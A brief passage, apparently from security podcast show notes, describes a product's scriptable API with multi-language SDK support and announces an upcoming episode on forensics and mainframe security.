• Scriptable API – expanded support within the Software Development Kit (SDK) for C, C#, Java, Python, Perl, Ruby and .Net allowing programmers to extend the NextGen infrastructure using almost any popular language.

In an upcoming Episode we will have forensics expert Scott Moulton, and Pieter Swanpoel who will provide us with a glimpse into Mainframe Security.